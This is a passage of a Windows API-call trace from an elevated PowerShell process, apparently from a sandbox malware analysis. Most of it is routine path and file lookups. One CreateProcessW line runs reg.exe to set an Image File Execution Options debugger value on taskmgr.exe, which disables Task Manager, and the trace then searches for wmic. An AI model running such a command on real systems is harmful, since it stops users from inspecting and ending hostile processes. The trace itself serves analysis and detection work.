ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0257.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0257.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0257.162] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\REG.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0257.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.163] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0257.163] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0257.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.163] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0257.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.163] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0257.163] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0257.164] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\REG.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709759b8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x709759b8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x709759b8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe800, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x7e1c120 [0257.164] FindNextFileW (in: hFindFile=0x7e1c120, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0257.164] FindClose (in: hFindFile=0x7e1c120 | out: hFindFile=0x7e1c120) returned 1 [0257.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.165] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe")) returned 0x20 [0257.165] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.165] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.165] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.165] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0257.166] GetConsoleWindow () returned 0x302b8 [0257.169] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.170] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.170] CoTaskMemAlloc (cb=0x804) returned 0x7e29838 [0257.170] GetConsoleTitleW (in: lpConsoleTitle=0x7e29838, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0257.171] CoTaskMemFree (pv=0x7e29838) [0257.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e678*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4dcaaf4 | out: lpCommandLine="\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessInformation=0x4dcaaf4*(hProcess=0x92c, hThread=0x928, dwProcessId=0xf48, dwThreadId=0xf58)) returned 1 [0257.189] CloseHandle (hObject=0x928) returned 1 [0257.189] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0257.190] GetCurrentProcess () returned 0xffffffff [0257.190] GetCurrentProcess () returned 0xffffffff [0257.190] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x92c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x928) returned 1 [0257.190] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x928, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0257.321] CloseHandle (hObject=0x928) returned 1 [0257.321] GetExitCodeProcess (in: hProcess=0x92c, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0257.321] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0257.325] CloseHandle (hObject=0x92c) returned 1 [0257.325] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.325] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.325] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.326] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.326] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.326] SetEvent (hEvent=0x90c) returned 1 [0257.326] SetEvent (hEvent=0x900) returned 1 [0257.326] SetEvent (hEvent=0x904) returned 1 [0257.326] SetEvent (hEvent=0x908) returned 1 [0257.326] SetEvent (hEvent=0x91c) returned 1 [0257.326] SetEvent (hEvent=0x910) returned 1 [0257.326] SetEvent (hEvent=0x914) returned 1 [0257.326] SetEvent (hEvent=0x918) returned 1 [0257.326] SetEvent (hEvent=0x924) returned 1 [0257.326] SetEvent (hEvent=0x920) returned 1 [0257.327] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0257.332] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0257.336] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xa83edc5a, Data2=0x27ae, Data3=0x4bab, Data4=([0]=0xb9, [1]=0xa4, [2]=0xce, [3]=0xf2, [4]=0xad, [5]=0xea, [6]=0x28, [7]=0x4d))) returned 0x0 [0257.336] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=35237110516) returned 1 [0257.336] AmsiOpenSession () returned 0x0 [0257.337] AmsiScanString () returned 0x80070015 [0257.340] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=35237490002) returned 1 [0257.340] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.341] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="0") returned 0x0 [0257.342] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0257.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.342] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0257.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.343] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0257.343] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0257.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.343] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0257.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.343] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0257.343] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0257.343] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0257.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.344] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0257.344] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0257.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.344] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0257.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.344] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0257.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0257.345] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0257.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0257.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0257.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.345] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0257.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.346] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0257.346] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0257.346] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0257.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.346] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0257.346] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.347] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0257.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0257.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0257.347] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0257.347] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.347] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, 